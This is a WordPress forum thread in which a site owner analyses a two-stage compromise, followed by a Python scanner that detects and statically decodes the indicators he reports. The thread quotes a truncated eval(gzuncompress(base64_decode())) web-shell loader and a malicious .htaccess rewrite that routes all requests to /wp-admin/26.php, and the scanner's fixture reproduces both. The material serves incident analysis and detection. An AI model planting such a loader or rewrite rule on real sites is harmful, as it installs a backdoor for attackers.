Sventy
Forum Replies Created
Forum: Fixing WordPress
In reply to: XML parsing error
@jbekker – yes, I thought about this. Or maybe to clean the incoming passwords of outdated login data that doesn’t work anymore, and keep only passwords that still work.
But the “price” for this would be an extremely high detection rate. If you look around the internet – almost all discussions start because a website didn’t work anymore. Just appending HTML code will break many scripts, even popular ones like WP and Joomla.
So why provoke such a high attention/detection rate?
What comes to my mind is: to divert our attention from what they are really doing. I have seen this once before: a very obvious attack, easy to detect and easy to clean up. At the same time, a very smart hidden backdoor was installed, which you might not notice because you clean up the easy, obvious stuff.
Sven
Forum: Fixing WordPress
In reply to: XML parsing error
Yes, it starts with a Trojan – what bothers me is the two-step approach. I don’t quite understand what the motivation is. If the Trojan sends out the passwords, why do they need the HTML injection to report the URL back? The Trojan could tell them…
Forum: Fixing WordPress
In reply to: XML parsing error
@emsi – it makes sense to post here, if only to make clear it is not a WP exploit (as one might think at first). We also have Joomla and custom-coded websites affected by this.
Important note: the attack comes in two stages. In stage one you see the HTML code injected as above.
About a day later I see uploads of files with names like “23.php” or “56.php” – always a two-digit number. Those files start with something like:
<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ...UQ=='))); ?>
I haven’t yet decoded the binary to see what it does.
You also see an upload of a .htaccess file with this content:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
</IfModule>
Where the binary code is being uncompressed and executed.
From what I can see on my side, I suspect the involvement of the TR/Crypt.XPACK.Gen Trojan – but I cannot yet 100% confirm it.
Sven
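An added example (not the poster's code) that scans a web root for the two stage-two indicators described in the post above: two-digit .php drop files wrapping eval(gzuncompress(base64_decode('...'))), and an .htaccess catch-all rewrite to /wp-admin/NN.php?q=$1. It unwraps the base64+zlib layer statically for an analyst instead of executing it; the sample web root and its payload are constructed fixtures, not the real captured files.

```python
import base64
import re
import tempfile
import zlib
from pathlib import Path

# Indicators from the thread: two-digit .php name, packed eval() body, catch-all rewrite.
SHELL_NAME = re.compile(r"^\d{2}\.php$")
SHELL_BODY = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'")
REWRITE = re.compile(r"RewriteRule\s+\S+\s+/wp-admin/\d{2}\.php\?q=\$1", re.I)


def decode_payload(blob: str) -> str:
    """Statically unwrap base64+zlib (PHP gzuncompress == zlib.decompress); nothing is run."""
    return zlib.decompress(base64.b64decode(blob)).decode("utf-8", "replace")


def scan_webroot(root: str) -> list:
    """Return (path, indicator, detail) for every file matching an indicator."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hit = REWRITE.search(text)
        if path.name == ".htaccess" and hit:
            findings.append((str(path), "htaccess-rewrite", hit.group(0)))
        m = SHELL_BODY.search(text)
        if m:
            kind = "packed-eval" + ("-2digit-name" if SHELL_NAME.match(path.name) else "")
            findings.append((str(path), kind, decode_payload(m.group(1))[:80]))
    return findings


def build_sample_webroot() -> str:
    """Constructed fixture mirroring the thread's description; not real captured malware."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-admin").mkdir()
    inner = b"<?php /* constructed second-layer sample */ echo 'hello'; ?>"
    blob = base64.b64encode(zlib.compress(inner)).decode()
    (root / "wp-admin" / "26.php").write_text(
        f"<? eval(gzuncompress(base64_decode('{blob}'))); ?>")
    (root / ".htaccess").write_text(
        "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{REQUEST_FILENAME} !-f\n"
        "RewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]\n"
        "</IfModule>\n")
    (root / "index.php").write_text("<?php echo 'legitimate page'; ?>")  # benign decoy
    return str(root)
```

Calling scan_webroot(build_sample_webroot()) yields two findings, the rewrite rule and the decoded second layer of 26.php, while the benign index.php is left alone.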